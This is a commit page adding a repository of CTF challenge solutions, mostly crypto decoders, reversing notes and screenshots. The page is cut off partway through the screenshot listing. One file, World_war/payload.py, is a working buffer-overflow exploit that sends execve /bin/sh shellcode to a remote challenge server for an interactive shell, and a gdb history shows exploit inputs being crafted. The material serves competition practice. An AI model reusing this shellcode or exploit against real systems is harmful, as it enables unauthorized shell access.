瀏覽代碼

first commit

master
Christopher Yu 5 年之前
當前提交
9601394f3e
共有 93 個檔案被更改,包括 669 行新增0 行删除
  1. +12
    -0
      AsgamaCTF/Crypto/1byte_ROXy/decode.py
  2. +1
    -0
      AsgamaCTF/Crypto/Capek/base
  3. +10
    -0
      AsgamaCTF/Crypto/Capek/decryptloop.py
  4. 二進制
      AsgamaCTF/Reverse/XOR_in_reverse/Xrev
  5. +194
    -0
      AsgamaCTF/Reverse/pwd/.gdb_history
  6. +1
    -0
      AsgamaCTF/Reverse/pwd/decode.py
  7. 二進制
      AsgamaCTF/Reverse/pwd/pwdrev
  8. 二進制
      CJ2018/Pwn/Dionysus/dionysus_client
  9. 二進制
      CJ2018/Pwn/Dionysus/dionysus_server
  10. 二進制
      GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip
  11. +26
    -0
      GKSK/Crypto/GKSK_Crypto_Service/decrypt.py
  12. +1
    -0
      GKSK/Crypto/GKSK_Crypto_Service/flag.enc
  13. +97
    -0
      GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py
  14. +1
    -0
      GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt
  15. 二進制
      GKSK/Joy/Hack_The_Game_v0.0.1/version001
  16. +4
    -0
      GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py
  17. +12
    -0
      GKSK/Joy/Hack_The_Game_v0.0.2/test.py
  18. 二進制
      GKSK/Joy/Hack_The_Game_v0.0.2/version002
  19. +3
    -0
      GKSK/Pwn/World_war/.gdb_history
  20. +15
    -0
      GKSK/Pwn/World_war/payload.py
  21. +1
    -0
      GKSK/Pwn/World_war/peda-session-world_war.txt
  22. 二進制
      GKSK/Pwn/World_war/world_war
  23. 二進制
      GKSK/Reverse/Decimal1.0/Decimal_1.0
  24. +35
    -0
      IDCC/Crypto/DecryptME/decrypt.py
  25. +1
    -0
      IDCC/Crypto/DecryptME/enkripsi
  26. +35
    -0
      IDCC/Crypto/DecryptME/test.py
  27. +29
    -0
      SlashRoot/Crypto/RSA_Token_Generator/payload.py
  28. 二進制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png
  29. 二進制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png
  30. 二進制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png
  31. 二進制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png
  32. 二進制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png
  33. 二進制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png
  34. 二進制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png
  35. 二進制
      TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png
  36. 二進制
      TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png
  37. 二進制
      TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png
  38. 二進制
      TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png
  39. +13
    -0
      TAMUCTF/Crypto/Smile/decoder.py
  40. 二進制
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png
  41. 二進制
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png
  42. 二進制
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png
  43. 二進制
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png
  44. +99
    -0
      TAMUCTF/Misc/Hello_World/decoder.py
  45. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png
  46. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png
  47. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png
  48. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png
  49. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png
  50. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/art.png
  51. +27
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt
  52. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf
  53. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png
  54. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip
  55. +3
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml
  56. +3
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels
  57. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml
  58. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml
  59. +1
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt
  60. +3
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels
  61. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml
  62. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml
  63. 二進制
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png
  64. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml
  65. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml
  66. +10
    -0
      TAMUCTF/Reverse/KeyGenMe/.gdb_history
  67. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png
  68. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png
  69. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png
  70. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png
  71. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png
  72. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png
  73. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png
  74. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png
  75. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png
  76. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png
  77. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png
  78. 二進制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png
  79. +20
    -0
      TAMUCTF/Reverse/KeyGenMe/bruteforce.py
  80. 二進制
      TAMUCTF/Reverse/KeyGenMe/keygenme
  81. 二進制
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153550.png
  82. 二進制
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153910.png
  83. 二進制
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_154148.png
  84. 二進制
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_202844.png
  85. 二進制
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203307.png
  86. 二進制
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203644.png
  87. 二進制
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203910.png
  88. 二進制
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200611.png
  89. 二進制
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200703.png
  90. 二進制
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200832.png
  91. 二進制
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201534.png
  92. 二進制
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201719.png
  93. 二進制
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_202358.png

+ 12
- 0
AsgamaCTF/Crypto/1byte_ROXy/decode.py 查看文件

@ -0,0 +1,12 @@
from pwn import *
cipher = "e7c1cdc1e3f4e6dbcfcec5ffc2d9d4c5ffd8cfd2d29f9fdd"
cipher = cipher.decode('hex')
for i in range(256):
plain = xor(cipher, i)
if "GamaCTF{" in plain:
print plain
break

+ 1
- 0
AsgamaCTF/Crypto/Capek/base 查看文件

@ -0,0 +1 @@
Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVjBaS2RHVkdXbFppVkZaeVZtMTRTMk15VGtsalJtaG9UV3N3ZUZadGNFZFRNazE1VTJ0V1ZXSkhhRzlVVmxaM1ZsWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpYZHpGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlVaclVqQTFSMWRyV25kV01ERkZVbFJHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMHhORmxWTUhoWGJrNVlZbFZhY2xWcVFURlNNVlY1VFZSU1ZrMXJjRmhWTW5SM1ZqSktWVkpZWkZwV1JWcHlWVEJhVDJOc2NFaGpSazVYVWpOb2IxWXhaRFJWTVVsNVZXNU9XR0pIVWxsWmJHaFRWMFpTVjJGRlRsTmlSbkJaV2xWYVQxWlhTbFpYVkVwV1lrWktSRlpxUVhoa1ZsWjFWMnhhYUdFeGNGbFhhMVpoVkRKTmVGcElUbWhTTW5oVVZGY3hiMWRzV1hoWGJYUk9VakZHTlZaWE5VOWhiRXAwVld4c1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1WFJVcElWbXBLTkZReFdsaFRhMlJxVW14d1dGbHNhRk5OTVZweFUydDBWMVpyY0ZwWGExcDNZa2RGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZVYkdocFZqSm9lbGRYZUc5aU1rbDRWMjVTVGxkSFVsWlVWbHBYVGxaV2RHUkhkRmROVjFKSldWVmFjMWR0U2tkWGJXaGFUVzVvV0ZreFdrZFdWa3B6VkdzMVYwMVZiekZXYlhCTFRrWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpPVFZad2VGVXlkREJXTVZweVkwWndXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTlc5a2JGcEhWbTA1VWsxWFVsaFdNV2h2V1ZaS1IxTnNaRlZXYkhCNlZHdGFWbVZYVWtoa1JtaFRUVWhDU2xac1pEUmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVk5yWkZOaVJrcDZWa2N4YzFVeVNuSlRiVVpYVFc1b1dGbHFTa1psUm1SWldrVTFWMVpzY0ZWWFYzUnJWVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUkVKWFRWWndlVll5ZUhkWGJGcFhZMGhLVjFaRldreFdNVnBIWTIxS1IxcEdaRTVOUlhCS1ZtMTBVMU14VlhoWFdHaGhVMFphVmxscldrdGpSbHB4VkcwNVYxWnNjRWhYVkU1dllWVXhXRlZ1Y0ZkTlYyaDJWMVphUzFJeFRuVlJiRlpYVFRGS05sWkdVa2RWTVZwMFVtdG9VRlp0YUZSVVZXaERVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZsWndNMVpyV21GalZrcDFXa1pPVGxacmNEVldSM2hoVkRKR1YxTnVVbEJXUlRWWVZGYzFiMWRHWkZkWGJFcHNWbXR3ZVZkcldtOWhWMFkyVm01b1YxWkZTbkpVYTFwclVqRldjMXBHYUdoTk1VcFZWbGN4TkdReVZrZFdXR3hyVWpOU2IxbHNWbmRXTVZwMFkwZEdXR0pHY0ZoWk1HUnZWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXlSa2hoUlRWWFltdEtNbFp0TVRCVk1VMTRWVmhzVlZkSGVGWlpWRVozWVVaV2NWTnRPVmRTYkVwWlZGWmpOV0pIU2toVmJHeGhWbGROTVZsV1ZYaFhSbFoxWTBaa1RsWXlhREpXYWtKclV6RmtWMVp1U2xCV2JIQndWakJhUzA1c1drZFZhMlJXVFdzeE5GWXlOVk5oTVVwMFZXNUNWMkpIYUVSVWJGcHJWbFpHZEZKdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp0ZUhkTk1XeFdWMjVrVTJKSVFrZFVNVlUxWVZaS1dWRllaRmhpUmxwb1ZrUktSMVl4VW5KWGJGSnBWbFp3V1ZaR1l6RmlNV1JIWWtoR1ZHRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQllWVEkxYjFZeFdYcGhTRXBhWVd0YWNsVnFSbGRqTWtaR1QxWmtWMVpHV2pKV2JHTjRUa2RSZVZaclpGZFhSM2h5VldwT1UySXhiSE5XYm1SWFRWZDRNVmt3VmpCV01rcEhZa1JhV2xaWGFFeFdNbmhoVjBaV2NscEhSbGRXTVVwUlZsUkNhMUl4U1hsU2EyaHBVbXMxY0ZVd1ZrdE5iRnB4VW0xR1ZrMVZNVFJXVm1oelZsWmtTR0ZIYUZaTlJuQm9WbTE0YzJOc1pISmtSM0JUWWtad05GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV2FrNVRWRVpzVlZGWWFGTldhM0I2VmtkNFlWVXlTa1pYV0hCWFZsWndSMVF4V2tOVmJFSlZUVVF3UFE9PQ==

+ 10
- 0
AsgamaCTF/Crypto/Capek/decryptloop.py 查看文件

@ -0,0 +1,10 @@
from base64 import *
with open("base", "r") as file:
text = file.read()
decoded = ""
while True:
decoded = b64decode(text)
text = decoded
if(text.find("CTF{") != -1):
break
print text

二進制
AsgamaCTF/Reverse/XOR_in_reverse/Xrev 查看文件


+ 194
- 0
AsgamaCTF/Reverse/pwd/.gdb_history 查看文件

@ -0,0 +1,194 @@
b *main
r
ni
r
ni
si
ni
si
ni
pdisas c
b *0x0000000000400761
r
ni
si
ni
r
ni
si
ni
ni
r
r
r < $(python -c "print '\xde\x00\x00\x00'")
r <<< $(python -c "print '\xde\x00\x00\x00'")
ni
r <<< $(python -c "print '\xde\x00\x00\x00'")
ni
r <<< $(python -c "print '\xbe\x00\x00\x00'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x00\x02'")
ni
si
ni
r <<< $(python -c "print '\x20\x00\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\x02\x00\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xef\xee\xbe\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\x1d'")
ni
pdisas c
b *0x0000000000400746
r <<< $(python -c "print '\xef\xee\xbe\xad\x22'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x11\x11\x11\x11\x1d'")
ni
r <<< $(python -c "print '\x11\x11\x11\x11\x1d\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 4 + '\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a * 8")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print 'a' + '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print 'a' * 8 + '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d\x1d'")
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xde\x1d\x1d\x1d'")
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 6 + '\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + 'a' * 7")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\x00' * 6")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\xd0' * 6")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7")
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 3 + '\x00' * 4 + '\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
ni
si
ni
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'* 7")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 20")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 40")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00'*7 + '\x1e'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 7")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14")
ni
si
ni
r <<< $(python -c "print '\x00' + '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13")
ni
si
ni
r <<< $(python -c "print '\xde' + '\x00' + '\x1e' * 13")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13")

+ 1
- 0
AsgamaCTF/Reverse/pwd/decode.py 查看文件

@ -0,0 +1 @@

二進制
AsgamaCTF/Reverse/pwd/pwdrev 查看文件


二進制
CJ2018/Pwn/Dionysus/dionysus_client 查看文件


二進制
CJ2018/Pwn/Dionysus/dionysus_server 查看文件


二進制
GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip 查看文件


+ 26
- 0
GKSK/Crypto/GKSK_Crypto_Service/decrypt.py 查看文件

@ -0,0 +1,26 @@
import base64
secret_out = ''
secret_str = ''.join("gksk-secret-code".split("-"))
for count, loop in enumerate(secret_str):
if count % 2 == 0:
secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop])
else:
secret_out += loop
print secret_out
enc = open("flag.enc", "r").read()
shift_key = 0
while True:
shift_key += 1
cipher = base64.b64decode(enc)
alphabet = secret_out * 50
shifted_alphabet = alphabet[shift_key:] + alphabet[:shift_key]
flag = ''
for i in range(len(cipher[:-1])):
flag += chr((ord(cipher[i]) ^ shift_key) - ord(shifted_alphabet[i]))
if "GKSK{" in flag:
print flag
break

+ 1
- 0
GKSK/Crypto/GKSK_Crypto_Service/flag.enc 查看文件

@ -0,0 +1 @@
kraiqvy1qe+2oqi2kbSftqS3/KmknKHv7+/rwbj/pK+h8+XS8p+topm17b72sK2b8q6go/ygmaijtfaxoZipm67vv6un8Zu2r7ag4fLHqZGz9Jzxkbet/qG2t5Gpk/ywmLWg/8/LwcyftKmuqbycqZC1rKqzsLWdtqys79ujqqGprLDjoaacor2qqqqgvJHuo7Co0OebveWToojt9s6otrWQqe+psq6h7baa/qG2t5Gpk//+BQ==

+ 97
- 0
GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py 查看文件

@ -0,0 +1,97 @@
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
import sys
import random
import base64
def banner():
return '''
Welcome to our brand new crypto service
________ _______ __ __ ____________ ______ __________ _____ __________ _ __________________
/ ____/ //_/ ___// //_/ / ____/ __ \ \/ / __ \/_ __/ __ \ / ___// ____/ __ \ | / / _/ ____/ ____/
/ / __/ ,< \__ \/ ,< / / / /_/ /\ / /_/ / / / / / / / \__ \/ __/ / /_/ / | / // // / / __/
/ /_/ / /| |___/ / /| | / /___/ _, _/ / / ____/ / / / /_/ / ___/ / /___/ _, _/| |/ // // /___/ /___
\____/_/ |_/____/_/ |_| \____/_/ |_| /_/_/ /_/ \____/ /____/_____/_/ |_| |___/___/\____/_____/
version [v2.1.19]
'''
def print_usage(script_argv):
print '[==USAGE==]\n'
print 'Encrypt File \t: %s -e [plaintext_file] [key]' % script_argv
print 'Decrypt File \t: %s -d [encrypted_file] [key]' % script_argv
print 'Generate Key \t: %s -g' % script_argv
print 'Help \t\t: %s -h\n' % script_argv
def shift_key():
key = random.randint(0x1, 0xff)
return key
def shuffle_secret():
secret_out = ''
secret_str = ''.join('gksk-secret-code'.split('-'))
for count,loop in enumerate(secret_str):
if count % 2 == 0:
secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop])
else:
secret_out += loop
return secret_out
def encryption(plain, shift):
try:
ciphertext = ''
length_msg = 50
with open(plain, 'rb') as bin:
data = bin.read()
shift = int(shift)
alphabet = shuffle_secret() * length_msg
shifted_alphabet = alphabet[shift:] + alphabet[:shift]
for a, b in zip(data, shifted_alphabet):
ciphertext += chr(ord(a) + ord(b) ^ shift)
with open(plain + '.enc', 'wb') as bin:
bin.write(base64.b64encode(ciphertext))
except ValueError:
print "ValueError : Range key [0-255]"
exit()
def decryption(enc_file, key):
with open(enc_file, 'rb') as bin:
data = bin.read()
'''NOT IMPLEMENTED YET'''
with open(enc_file + '.trial', 'wb') as bin:
bin.write(data)
def main():
print banner()
script_argv = sys.argv[0]
try:
mode = sys.argv[1]
if mode == '-e':
plaintext_file = sys.argv[2]
key = sys.argv[3]
encryption(plaintext_file, key)
print "\nSECRET KEY : ", shuffle_secret()
print '\nThankyou for using our service :)\n'
elif mode == '-d':
encrypted_file = sys.argv[2]
key = sys.argv[3]
decryption(encrypted_file, key)
print '\nNot implemented yet. Upgrade to premium, only $99999\n'
elif mode == '-g':
print 'Key : ', shift_key()
elif mode == '-h':
print_usage(script_argv)
else:
print_usage(script_argv)
except IndexError:
print_usage(script_argv)
if __name__ == '__main__':
main()

+ 1
- 0
GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt 查看文件

@ -0,0 +1 @@
GKSK{4re_Y0u_53ri0usly_checking_f0r_b3t4_t3sT?}

二進制
GKSK/Joy/Hack_The_Game_v0.0.1/version001 查看文件


+ 4
- 0
GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py 查看文件

@ -0,0 +1,4 @@
import base64
cheat = "PlayerLevel=1;PlayerExp=1;PlayerHP=100;PlayerAtk=987654321;PlayerDef=987654321;PlayerName=ar"
print base64.b64encode(cheat)

+ 12
- 0
GKSK/Joy/Hack_The_Game_v0.0.2/test.py 查看文件

@ -0,0 +1,12 @@
cheat = "UGxheWVyTGV2ZWw9OTk5OTk5OTk5O1BsYXllckV4cD05OTk5OTk5OTk5O1BsYXllckhQPTk4NzY1NDMyMTtQbGF5ZXJBdGs9OTg3NjU0MzIxO1BsYXllckRlZj05ODc2NTQzMjE7UGxheWVyTmFtZT1Cb2Rv"
alphabet = "abcdefghijklmnopqrstuvwxyz"
newcheat = ""
for i in cheat:
if i in alphabet.upper():
newcheat += i.lower()
elif i in alphabet.lower():
newcheat += i.upper()
else:
newcheat += i
print newcheat

二進制
GKSK/Joy/Hack_The_Game_v0.0.2/version002 查看文件


+ 3
- 0
GKSK/Pwn/World_war/.gdb_history 查看文件

@ -0,0 +1,3 @@
pattern create 500
r
pattern offset 0x65414149

+ 15
- 0
GKSK/Pwn/World_war/payload.py 查看文件

@ -0,0 +1,15 @@
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
from pwn import *
r = remote("180.250.7.183", 51137)
r.recvuntil("coordinate : ")
buff = r.recvline()
buff = buff[:10]
buff = int(buff, 16)
buff = p32(buff)
payload = shellcode + "a" * (72-len(shellcode)) + buff
r.sendline(payload)
r.interactive()

+ 1
- 0
GKSK/Pwn/World_war/peda-session-world_war.txt 查看文件

@ -0,0 +1 @@

二進制
GKSK/Pwn/World_war/world_war 查看文件


二進制
GKSK/Reverse/Decimal1.0/Decimal_1.0 查看文件


+ 35
- 0
IDCC/Crypto/DecryptME/decrypt.py 查看文件

@ -0,0 +1,35 @@
# Python2 ver.
# If you use Python3 interpreter, the trouble will be in print format
# [KSL Playground][Crypto][IDCC2018 DecryptME] written by Mr. Goodnight
# Link: https://euectf.stikom-bali.ac.id/challenges#[IDCC]%20DecryptME
# Flag: IDCC{S1mpl3_4nd_stR4ight}
from base64 import *
# Encryption algorithm
# ciphertext = plaintext + keys
with open('./enkripsi', mode = 'r') as f:
ciphertext = f.read()
# plaintext = ciphertext - keys
# Make my own function to decrypt the ciphertext
def decrypt(ciphertext, keys):
plaintext = ""
for num,char in enumerate (ciphertext):
plaintext += chr((ord(char) - ord(keys[num % len(keys)])) % 127)
return plaintext
# keys = ciphertext - plaitext
# Find the key by using known string attack
# Then I found out that the key is raja
known_string = b64encode("IDCC{")
keys = ""
for num,char in enumerate (known_string):
keys += chr((ord(ciphertext[num]) - ord(char)) % 127)
# Run the decrypt function the decode it
keys = "raja"
flag = b64decode(decrypt(ciphertext, keys))
print ("Flag: {f}".format(f = flag))

+ 1
- 0
IDCC/Crypto/DecryptME/enkripsi 查看文件

@ -0,0 +1 @@
F7=&D_6@9YU&9HA) MK9HL=RMSY3(

+ 35
- 0
IDCC/Crypto/DecryptME/test.py 查看文件

@ -0,0 +1,35 @@
from base64 import *
def enkripsi(plain, keys):
enc = []
plain = b64encode(plain)
for i, l in enumerate(plain):
kunci = ord(keys[i % len(keys)])
teks = ord(l)
enc.append(chr((teks + kunci) % 127))
#enc = teks + kunci
return ''.join(enc)
def findKey():
key = []
known = b64encode("IDCC{")
file = open("enkripsi", "rb")
file = file.read()
for i, l in enumerate(known):
kunci = ord(file[i])
teks = ord(l)
key.append((chr((kunci - teks) % 127)))
return ''.join(key)
def decryption():
key = "raja"
flag = []
file = open("enkripsi", "r").read()
for i, l in enumerate(file):
kunci = ord(key[i % len(key)])
cipher = ord(l)
flag.append(chr((cipher - kunci) % 127))
return ''.join(flag)
print findKey()
print b64decode(decryption())

+ 29
- 0
SlashRoot/Crypto/RSA_Token_Generator/payload.py 查看文件

@ -0,0 +1,29 @@
from pwn import *
r = remote("103.200.7.156", 1003)
r.recvuntil(">>> ")
r.sendline("2")
for i in range(5):
r.recvuntil("e = ")
e = r.recvline()
e = int(e[:-1])
r.recvuntil("n = ")
n = r.recvline()
n = int(n[:-1])
r.recvuntil("c = ")
c = r.recvline()
c = int(c[:-1])
p = 1000
while True:
if(pow(p, e, n) == c):
break
p +=1
r.sendline(str(p))
print "p = ", p
r.interactive()

二進制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 81 KiB

二進制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png 查看文件

Before After
Width: 879  |  Height: 57  |  Size: 12 KiB

二進制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png 查看文件

Before After
Width: 1153  |  Height: 150  |  Size: 10 KiB

二進制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 71 KiB

二進制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png 查看文件

Before After
Width: 890  |  Height: 82  |  Size: 27 KiB

二進制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png 查看文件

Before After
Width: 1032  |  Height: 610  |  Size: 82 KiB

二進制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png 查看文件

Before After
Width: 885  |  Height: 92  |  Size: 33 KiB

二進制
